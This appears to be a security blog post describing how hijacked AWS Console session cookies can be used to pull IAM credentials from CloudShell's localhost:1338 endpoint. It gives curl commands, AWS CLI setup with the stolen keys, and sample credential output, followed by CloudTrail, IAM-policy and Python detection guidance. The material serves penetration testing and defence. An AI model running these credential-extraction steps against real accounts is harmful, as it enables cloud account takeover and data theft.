
Navigating AWS infrastructure during a penetration test can be challenging without direct credentials. However, if you gain AWS Console access via session cookies, you can extract IAM credentials using CloudShell by leveraging an undocumented endpoint on port 1338. This technique is invaluable when you need to run tools outside the console environment.
You Should Know:
Step-by-Step Exploitation Process
1. Access AWS Console via Session Cookies
- Obtain session cookies (e.g., through phishing, XSS, or session hijacking).
- Use browser dev tools (F12 → `Application` → Cookies) to extract:
– `aws-userInfo`
– `aws-creds`
2. Open CloudShell
- Once inside the AWS Console, launch AWS CloudShell (available in the top navigation bar).
3. Extract IAM Credentials via Port 1338
- CloudShell internally communicates with an undocumented API on `localhost:1338`.
- Run the following command in CloudShell to retrieve temporary credentials:
curl http://localhost:1338/latest/meta-data/iam/security-credentials/
- The response will include the IAM role name. Fetch credentials using:
curl http://localhost:1338/latest/meta-data/iam/security-credentials/<ROLE_NAME>
4. Use Extracted Credentials
- Configure AWS CLI with the stolen credentials:
aws configure set aws_access_key_id <ACCESS_KEY>
aws configure set aws_secret_access_key <SECRET_KEY>
aws configure set aws_session_token <SESSION_TOKEN>
- Verify access:
aws sts get-caller-identity
Mitigation & Detection
- Enable CloudTrail Logging to monitor unusual CloudShell activity.
- Restrict CloudShell Permissions using IAM policies:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Deny",
"Action": "cloudshell:*",
"Resource": "*"
}
]
}
- Session Hardening: Enforce MFA and short-lived sessions.
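The CloudTrail monitoring recommended above, as an added Python example (not from the original post): it flags CloudShell session events made by principals outside an allow list, or from a source IP that never appeared in that principal's ConsoleLogin events. The records, ARNs, IPs and allow list are constructed, and the IP-mismatch rule is a heuristic assumed here, not an AWS feature.

```python
CLOUDSHELL = "cloudshell.amazonaws.com"
# CloudShell API calls that create or authorise a shell session.
SESSION_ACTIONS = {"CreateEnvironment", "StartEnvironment", "CreateSession", "PutCredentials"}

def flag_cloudshell_events(records, approved_arns):
    """Return (reason, principal ARN, eventName, source IP) tuples."""
    login_ips = {}  # principal ARN -> IPs seen in its ConsoleLogin events
    findings = []
    for rec in sorted(records, key=lambda r: r["eventTime"]):
        arn = rec.get("userIdentity", {}).get("arn", "unknown")
        ip = rec.get("sourceIPAddress", "")
        source, name = rec.get("eventSource"), rec.get("eventName")
        if source == "signin.amazonaws.com" and name == "ConsoleLogin":
            login_ips.setdefault(arn, set()).add(ip)
        elif source == CLOUDSHELL and name in SESSION_ACTIONS:
            if arn not in approved_arns:
                findings.append(("unapproved-principal", arn, name, ip))
            elif ip not in login_ips.get(arn, set()):
                # Heuristic (assumption): a console session replayed from
                # stolen cookies shows an IP that never logged in.
                findings.append(("ip-not-seen-at-login", arn, name, ip))
    return findings

def _ev(time, source, name, user, ip):
    """Build a constructed CloudTrail record with only the fields used above."""
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "userIdentity": {"arn": f"arn:aws:iam::111122223333:user/{user}"},
            "sourceIPAddress": ip}

# Constructed sample data: documentation IP ranges, placeholder account ID.
ALICE = "arn:aws:iam::111122223333:user/alice"
SAMPLE = [
    _ev("2025-06-11T10:00:00Z", "signin.amazonaws.com", "ConsoleLogin", "alice", "198.51.100.10"),
    _ev("2025-06-11T10:05:00Z", CLOUDSHELL, "CreateEnvironment", "alice", "198.51.100.10"),
    _ev("2025-06-11T10:40:00Z", CLOUDSHELL, "CreateSession", "alice", "203.0.113.77"),
    _ev("2025-06-11T11:00:00Z", CLOUDSHELL, "CreateSession", "bob", "198.51.100.20"),
    _ev("2025-06-11T11:05:00Z", "s3.amazonaws.com", "ListBuckets", "alice", "198.51.100.10"),
]

if __name__ == "__main__":
    for finding in flag_cloudshell_events(SAMPLE, approved_arns={ALICE}):
        print(finding)
```

In production the records would come from a CloudTrail trail or CloudTrail Lake query rather than an inline list, and the login-IP history would need a retention window matched to the console session lifetime.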
What Undercode Say
This technique highlights a critical AWS security gap where session cookies can be weaponized to escalate privileges. Defenders must:
– Monitor CloudShell API calls in CloudTrail.
– Implement least privilege for IAM roles.
– Use AWS Session Manager instead of persistent sessions where possible.
Expected Output:
{
"AccessKeyId": "ASIAXXXXXXXXXXXX",
"SecretAccessKey": "XXXXXXXXXXXXXXXXXXXX",
"Token": "XXXXXXXXXXXXXXXXXXXX",
"Expiration": "2025-06-12T00:00:00Z"
}
Prediction
As AWS continues to expand its services, undocumented APIs and hidden endpoints will remain a prime target for attackers. Expect more research into CloudShell, AWS SSM, and Lambda as attack vectors.
Reference:
Get IAM Credentials from a Console Session – Hacking The Cloud
Reported By: Hacking The – Hackers Feeds


